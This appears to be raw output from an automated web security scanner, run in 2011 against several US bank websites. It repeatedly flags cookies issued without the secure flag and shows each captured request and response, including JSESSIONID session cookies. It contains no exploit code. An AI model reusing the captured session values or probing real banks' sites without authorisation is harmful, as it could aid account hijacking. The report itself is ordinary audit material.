The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Referer: https://www.capitalone.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:21 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: application/x-javascript Content-Length: 125
var xp1CC = ""; var xp1zip = "0"; var xp1region = "national"; var xp1eosSet = "N"; var xp1PageName = "";
The following cookie was issued by the application and does not have the secure flag set:
v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:30 GMT Content-length: 22894 Content-type: text/html Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Wed, 02 Feb 2011 15:05:03 GMT Etag: "596e-4d49729f" Accept-ranges: bytes Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head> ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wamuwelcome3/ HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:50 GMT Content-length: 14892 Content-type: text/html Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Thu, 06 Jan 2011 22:25:12 GMT Etag: "3a2c-4d264148" Accept-ranges: bytes
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NASApp/NetAccess/LoginDisplay HTTP/1.1 Host: www.ibsnetaccess.com Connection: keep-alive Referer: http://www.ibsnetaccess.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.myschedule.navyfederal.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 15100 Content-Type: text/html Content-Location: http://www.myschedule.navyfederal.org/Default.htm Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT Accept-Ranges: bytes ETag: "014cf449e67c11:5e8" X-Powered-By: ASP.NET Date: Wed, 02 Feb 2011 22:19:30 GMT Connection: close Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/charteroneinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=311; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure Content-length: 264 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33 Fscalleeid: ibweb311 Fselapsedtime: 9719 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=321; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33 Fscalleeid: ibweb321 Fselapsedtime: 9769 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Clickthrough&RequestType=Click&COID= HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 404 Not found Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:03 GMT Content-length: 3018 Content-type: text/html; charset=ISO-8859-1 Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/diversity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 8581 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>About Wells Fargo - Diversity ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-length: 11460 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2046057226.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 301 Moved Permanently Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:49 GMT Content-length: 15 Content-type: text/html; charset=ISO-8859-1 X-Cnection: close Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010 Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2348047114.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browser/jaws_setting HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-length: 3286 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2146720522.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:00 GMT Content-length: 7617 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2515819274.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2264161034.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com/comintro HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:25 GMT Location: https://www.wellsfargo.com/com/ Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/com/">h ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2532596490.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1777621770.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/select_card HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Location: https://www.wellsfargo.com/credit_cards/ Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/credit_ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2129943306.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2163497738.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/rate_payments/information/rate_calc HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Location: https://www.wellsfargo.com/equity/tools/rate_calc Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/equity/ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:21 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service f ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/faqs/signon_faqs HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:22 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/services HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:23 GMT Content-length: 11416 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service - ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2532596490.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:54 GMT Content-length: 8678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
